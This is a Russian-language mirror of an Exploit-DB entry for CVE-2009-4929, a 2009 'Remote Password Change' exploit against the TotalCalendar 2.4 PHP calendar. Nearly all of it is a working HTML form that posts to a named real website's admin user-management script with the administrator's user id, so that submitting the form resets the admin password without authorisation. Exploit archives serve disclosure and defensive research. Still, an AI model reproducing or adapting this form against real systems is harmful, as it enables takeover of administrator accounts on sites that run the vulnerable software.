- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8496
- Проверка EDB
-
- Пройдено
- Автор
- THE G0BL!N
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-4929
- Дата публикации
- 2009-04-20
HTML:
<title> Powered by: TotalCalendar 2.4 Remote Password Change </title>
<tr align="left">
<td width="10"> </td>
<td align="center"><span class="boxHeader">Cod[3]d By ThE g0bL!N</span></td>
<td width="10" align="right"></td>
</tr>
</table></span></td>
</tr>
</table>
</td>
</tr>
<tr>
<td style="padding: 0px;">
<table width="100%" height="100%" cellspacing="0" style="padding: 0px;">
<tr>
<td height="100%" style="padding: 0px;">
<div align="left" id="25_content_area" style="">
<script language="javascript">
// Should we show the pw changing fields or not
function pwChanger(bool)
{
if(bool)
{
// Show password changer
document.getElementById('pwChange').style.display = "none";
document.getElementById('pwDontChange').style.display = "";
document.getElementById('pwChangerArea').style.display = "";
document.getElementById('changePW').value = 1;
}
else
{
// Hide password changer
document.getElementById('pwChange').style.display = "";
document.getElementById('pwDontChange').style.display = "none";
document.getElementById('pwChangerArea').style.display = "none";
document.getElementById('changePW').value = 0;
}
}
</script>
<br /<br /><br /><form method="POST" action="http://www.swingknoxville.org/calendar/admin/manage_users.php"><input type="hidden" name="action" value="Save" /><input id="changePW" type="hidden" name="changePW" value="0" /><input type="hidden" name="uid" value="1" />
<table align="center">
<tr>
<td align="right" valign="top"><b>First Name:</b></td>
<td> </td>
<td align="left" valign="top"><input name="fname" value="Dos-Dz" size="33" /></td>
</tr>
<tr>
<td align="right" valign="top"><b>Last Name:</b></td>
<td> </td>
<td align="left" valign="top"><input name="lname" value="admin" size="33" /></td>
</tr>
<tr>
<td colspan="3"> </td>
</tr>
<tr>
<td align="right" valign="top"><b>Username:</b></td>
<td> </td>
<td align="left" valign="top"><input name="username" value="admin" size="25" /></td>
</tr>
<tr>
<td align="right" valign="top"><b>Email Address:</b></td>
<td> </td>
<td align="left" valign="top"><input name="email" value="[email protected]" size="40" /></td>
</tr>
<tr>
<td colspan="3"> </td>
</tr>
<tr id="pwChange">
<td align="right" valign="top"> </td>
<td> </td>
<td align="left" valign="top"><a class="smallLinkText" onClick="pwChanger(true);" title="Click here to reset user's passord..." style="cursor: pointer;">Reset Password</a></td>
</tr>
<tr id="pwDontChange" style="display: none;">
<td align="right" valign="top"> </td>
<td> </td>
<td align="left" valign="top"><a class="smallLinkText" onClick="pwChanger(false);" title="Don't reset user's password password..." style="cursor: pointer;">Do Not Reset Password</a></td>
</tr>
<tr>
<td colspan="3"> </td>
</tr>
<tr id="pwChangerArea" style="display: none;">
<td colspan="3">
<table width="100%">
<tr>
<td align="right" valign="top"><b>New Password:</b></td>
<td> </td>
<td align="left" valign="top"><input type="password" name="newPW1" size="20" /></td>
</tr>
<tr>
<td align="right" valign="top"><b>Confirm New Password:</b></td>
<td> </td>
<td align="left" valign="top"><input type="password" name="newPW2" size="20" /></td>
</tr>
<tr>
<td colspan="3"> </td>
</tr>
</table>
</td>
</tr>
<tr>
<td colspan="3" align="center"><input type="submit" name="action" value="Save" /> <input type="submit" name="action" value="Cancel" /></td>
</tr>
</table></form><br /></div></td>
# milw0rm.com [2009-04-20]- Источник
- www.exploit-db.com
